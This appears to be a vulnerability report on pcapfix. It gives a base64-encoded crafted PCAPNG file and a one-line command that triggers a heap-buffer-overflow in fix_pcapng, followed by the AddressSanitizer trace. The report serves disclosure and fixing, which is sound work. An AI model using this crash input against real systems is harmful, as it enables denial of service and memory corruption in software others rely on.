pcapfix built from commit
5c2965 with Clang 13 (+ASan) on Ubuntu 20.04.2 LTS, we discovered a PCAPNG file which triggers a heap-buffer-overflow during a memcpy operation.
echo "Cg0NCgAAAADT1MOysvgUAAAAAEpaggAAoPWPsvgUAAAAAAAAAAAA" | base64 -d > /tmp/fuzz.pcap && ./pcapfix -s -v /tmp/fuzz.pcap
The above POC produces this output including Address Sanitizer stack trace:
[*] Reading from file: /tmp/fuzz.pcap [*] Writing to file: fixed_fuzz.pcap [*] File size: 39 bytes. [+] This is a PCAPNG file. [*] FOUND: Section Header Block at position 0 (0 bytes) [-] Unknown Byte Order Magic: 0xb2c3d4d3 ==> CORRECTED. [-] Major version number: 63666 ==> CORRECTED. [-] Minor version number: 20 ==> CORRECTED. [*] Section length: 143324300181504 ==> SETTING TO -1 [*] Block size adjusted (0 --> 28). ================================================================= ==2393459==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000051 at pc 0x0000004334b4 bp 0x7ffe43f9a430 sp 0x7ffe43f99bf0 READ of size 28 at 0x602000000051 thread T0 #0 0x4334b3 in __interceptor_memcpy (/root/pcapfix/pcapfix+0x4334b3) #1 0x4dfb9d in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34:10 #2 0x4dfb9d in fix_pcapng /root/pcapfix/pcapng.c:1361:7 #3 0x4c9eec in main /root/pcapfix/pcapfix.c #4 0x7ff8d3b780b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #5 0x41c58d in _start (/root/pcapfix/pcapfix+0x41c58d) 0x602000000051 is located 0 bytes to the right of 1-byte region [0x602000000050,0x602000000051) allocated by thread T0 here: #0 0x497acd in __interceptor_malloc (/root/pcapfix/pcapfix+0x497acd) #1 0x4d829e in fix_pcapng /root/pcapfix/pcapng.c:210:17 #2 0x4c9eec in main /root/pcapfix/pcapfix.c #3 0x7ff8d3b780b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 SUMMARY: AddressSanitizer: heap-buffer-overflow (/root/pcapfix/pcapfix+0x4334b3) in __interceptor_memcpy
This vulnerability is capable of crashing the software, causing memory corruption, and any other unintended consequences of reading past the end of the buffer.